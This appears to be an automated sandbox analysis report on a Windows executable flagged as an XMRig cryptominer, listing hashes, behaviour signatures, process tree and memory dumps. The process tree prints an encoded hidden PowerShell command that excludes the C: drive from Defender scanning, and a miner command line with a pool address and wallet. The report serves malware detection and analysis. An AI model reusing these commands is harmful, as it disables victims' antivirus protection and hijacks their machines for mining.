Overview

overview

10

Static

static

3

b8269de118...c4.exe

windows7-x64

7

b8269de118...c4.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    155s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2023 20:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe

  • Size

    628KB

  • MD5

    399935464053070d7d563688111ec538

  • SHA1

    ae2c6be5624a4f9ac3a25d07492f91f090cbc855

  • SHA256

    b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4

  • SHA512

    dfc4a2c1b4fa33bbc366ad68aee8158cba8f7aede59b95de2ea440b9e9caca25dd55363f4b522f6f57b132adbaef95f415ebdfa5a1acb4dcefe315192bbee597

  • SSDEEP

    12288:Nt4WgFT4sdX96+3lxGa75Qmvr0OMTHwtUH3OCzMdOh6:Nt43lvX931xGa7GmvgRTQtieCgdC6

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 11 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe
    "C:\Users\Admin\AppData\Local\Temp\b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4536
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2716
  • C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
    C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3400
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:468
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 44hkbozfzb2j1HuG4ZUrYTXbgE4omN34ffTsZjsG2NUs3iwLtMATrei19gDroXxnn8MBLxYV8LdHNQNeDArSYfS55EgagMA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2104

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5ogtua3.nbj.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
    Filesize

    628KB

    MD5

    399935464053070d7d563688111ec538

    SHA1

    ae2c6be5624a4f9ac3a25d07492f91f090cbc855

    SHA256

    b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4

    SHA512

    dfc4a2c1b4fa33bbc366ad68aee8158cba8f7aede59b95de2ea440b9e9caca25dd55363f4b522f6f57b132adbaef95f415ebdfa5a1acb4dcefe315192bbee597

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
    Filesize

    628KB

    MD5

    399935464053070d7d563688111ec538

    SHA1

    ae2c6be5624a4f9ac3a25d07492f91f090cbc855

    SHA256

    b8269de1184ce96e6dcfde6d0e1a00ac2d99db87fb72969bd2a6af2590afbbc4

    SHA512

    dfc4a2c1b4fa33bbc366ad68aee8158cba8f7aede59b95de2ea440b9e9caca25dd55363f4b522f6f57b132adbaef95f415ebdfa5a1acb4dcefe315192bbee597

    Download Submit

  • memory/468-43-0x00000200B11D0000-0x00000200B11E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/468-45-0x00000200B11D0000-0x00000200B11E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/468-46-0x00007FFC7A310000-0x00007FFC7ADD1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/468-59-0x00000200B11D0000-0x00000200B11E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/468-47-0x00000200B11D0000-0x00000200B11E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/468-48-0x00000200B11D0000-0x00000200B11E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/468-52-0x00000200B11D0000-0x00000200B11E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/468-42-0x00007FFC7A310000-0x00007FFC7ADD1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2104-55-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-49-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-54-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-53-0x000001BA6B250000-0x000001BA6B270000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2104-57-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-51-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-50-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-56-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-58-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-60-0x000001BA6B290000-0x000001BA6B2B0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2104-61-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-62-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-63-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2104-64-0x000001BA6B2B0000-0x000001BA6B2D0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2104-65-0x000001BA6B2B0000-0x000001BA6B2D0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2716-20-0x000001F6F6B50000-0x000001F6F6B72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2716-21-0x000001F6F6A40000-0x000001F6F6A50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2716-8-0x00007FFC7A660000-0x00007FFC7B121000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2716-9-0x000001F6F6A40000-0x000001F6F6A50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2716-26-0x00007FFC7A660000-0x00007FFC7B121000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2716-27-0x000001F6F6A40000-0x000001F6F6A50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2716-33-0x00007FFC7A660000-0x00007FFC7B121000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2716-30-0x000001F6F6A40000-0x000001F6F6A50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2716-29-0x000001F6F6A40000-0x000001F6F6A50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2716-28-0x000001F6F6A40000-0x000001F6F6A50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3400-44-0x00007FFC7A310000-0x00007FFC7ADD1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3400-37-0x000001F5F3E90000-0x000001F5F3EA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3400-36-0x00007FFC7A310000-0x00007FFC7ADD1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3400-39-0x000001F5F3E90000-0x000001F5F3EA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3400-38-0x000001F5D9D60000-0x000001F5D9DB4000-memory.dmp

    Filesize

    336KB

    Download

  • memory/4536-7-0x00007FFC7A660000-0x00007FFC7B121000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4536-10-0x000001FDB4F70000-0x000001FDB4F80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4536-0-0x000001FDB4A90000-0x000001FDB4B32000-memory.dmp

    Filesize

    648KB

    Download

  • memory/4536-25-0x00007FFC7A660000-0x00007FFC7B121000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4536-6-0x000001FDCF110000-0x000001FDCF164000-memory.dmp

    Filesize

    336KB

    Download

  • memory/4536-4-0x000001FDB4FA0000-0x000001FDB4FF6000-memory.dmp

    Filesize

    344KB

    Download

  • memory/4536-5-0x000001FDCF0C0000-0x000001FDCF10C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4536-3-0x000001FDB4F70000-0x000001FDB4F80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4536-2-0x00007FFC7A660000-0x00007FFC7B121000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4536-1-0x000001FDCEFC0000-0x000001FDCF0C0000-memory.dmp

    Filesize

    1024KB

    Download